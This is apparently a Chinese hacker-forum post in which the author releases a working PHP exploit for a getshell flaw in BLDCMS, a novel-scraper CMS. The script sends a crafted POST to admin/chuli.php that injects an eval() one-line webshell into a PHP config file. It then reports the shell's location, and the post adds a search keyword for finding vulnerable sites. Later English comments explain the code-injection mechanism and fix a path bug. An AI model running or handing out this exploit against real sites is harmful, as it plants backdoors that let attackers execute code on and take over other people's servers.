之前想搞一个黑阔站，发现旁站有一个站用了 BLDCMS，就把源码下载下来看了一下，找到了一个 getshell 漏洞。
话说昨晚晴天小铸在 90sec 发现有人把这个 getshell 漏洞的分析发出来了，擦，居然被人先发了。
既然都有人发了，我就把我之前写好的 EXP 放出来吧。
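<?php
// BLDCMS (白老大 PHP novel-scraper) "getshell" proof of concept, 2013-03-21,
// as published by 数据流@wooyun. Reconstructed from a forum paste whose
// anti-copy filter had interleaved junk characters and rewritten tokens
// (`<!--?php`, `emptyempty`, ` OST`, the `$eval` assignment split over two
// lines); the logic is the original author's.
//
// What the request does, as far as this listing shows: a single POST to
// admin/chuli.php?action=a_1 whose `sqlite` field is
//     ';eval($_POST["<pass>"]);'
// and the script then reports conn/config/normal2.php as the shell location.
// So the handler presumably writes the submitted settings into that PHP
// config file without escaping — i.e. PHP code injection through an
// unescaped config write. The leading single quote is what closes the
// string literal in the generated file, which is why the author states the
// precondition "GPC=Off" (magic_quotes_gpc; with it On the quote would be
// backslash-escaped and the payload stays an inert string).
// No session cookie or credential is sent. Whether chuli.php enforces any
// authentication cannot be confirmed from this listing — TODO(review): verify
// against the CMS source before relying on "unauthenticated".
//
// Usage: php EXP.php <host> <cms-dir> <password>
//   host      target host name only (no scheme; port 80 is hard-coded)
//   cms-dir   web path of the CMS install, e.g. /cms/ ("/" for web root)
//   password  name of the POST field the planted eval() reads

echo "--------------------------------------------------------------------------------\r\n"
   . " BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP (GPC=Off)\r\n"
   . " Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n"
   . " 2013.3.21\r\n"
   . " 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n"
   . " 搜索关键字:\"开发者: 白老大小说\"\r\n"
   . "--------------------------------------------------------------------------------\r\n";

$url  = isset($argv[1]) ? $argv[1] : '';
$dir  = isset($argv[2]) ? $argv[2] : '';
$pass = isset($argv[3]) ? $argv[3] : '';

if (empty($pass) || empty($url)) {
    exit("请输入参数");
}

// Payload: close the string literal the config writer puts the value into,
// append an eval() of the chosen POST field, and re-open a literal so the
// generated line still parses.
$eval = '\';eval($_POST["' . $pass . '"]);\'';

// The other fields are whatever chuli.php apparently requires to take the
// "save settings" branch; only `sqlite` carries the injection. Nothing is
// URL-encoded, so $pass must not contain '&', '+' or '%' or the body will be
// mis-parsed server-side.
$fuckdata = 'sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite=' . $eval;

/**
 * Send the injection request over a raw socket and print where the shell
 * should now be reachable.
 *
 * @param string $url  target host name; also used as the Host header
 * @param string $pass one-line-shell password, repeated in the final hint
 *
 * Reads $dir and $fuckdata from global scope, as the original did.
 * Exits with a message if the connection or the write fails; returns nothing.
 */
function getshell($url, $pass)
{
    global $dir, $fuckdata;

    // The original hard-coded "/admin/chuli.php" and ignored $dir, so it only
    // reached installs at the web root even though the usage text documents
    // /cms/. Build the request-target from $dir instead.
    $base = trim($dir, '/');
    $path = ($base === '' ? '' : '/' . $base) . '/admin/chuli.php?action=a_1';

    $request  = "POST " . $path . " HTTP/1.1\r\n";
    $request .= "Host: " . $url . "\r\n";
    $request .= "User-Agent: MSIE\r\n";
    $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $request .= "Content-Length: " . strlen($fuckdata) . "\r\n";
    $request .= "Connection: Close\r\n";
    $request .= "\r\n";
    $request .= $fuckdata;

    $fp = @fsockopen($url, 80, $errno, $errstr, 15);
    if (!$fp) {
        exit("利用失败:请检查指定目标是否能正常打开");
    }
    if (fwrite($fp, $request) === false) {
        fclose($fp);
        exit("利用失败");
    }

    // Drain the response so the server finishes handling the request before
    // the connection is dropped. The original discarded it entirely; the
    // status line is surfaced here so the operator can tell a 200 from a
    // 404/403 before going looking for the shell.
    $receive = '';
    while (!feof($fp)) {
        $receive .= fgets($fp, 1000);
    }
    fclose($fp);
    $status = strtok($receive, "\r\n");

    echo "响应: " . ($status === false ? '(无)' : $status) . "\r\n";
    echo "shell: " . $url . ($base === '' ? '' : '/' . $base)
       . "/conn/config/normal2.php  密码: " . $pass
       . " (如连接失败 请检查目标GPC是否=off)\r\n";
}

getshell($url, $pass);
?>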
by 数据流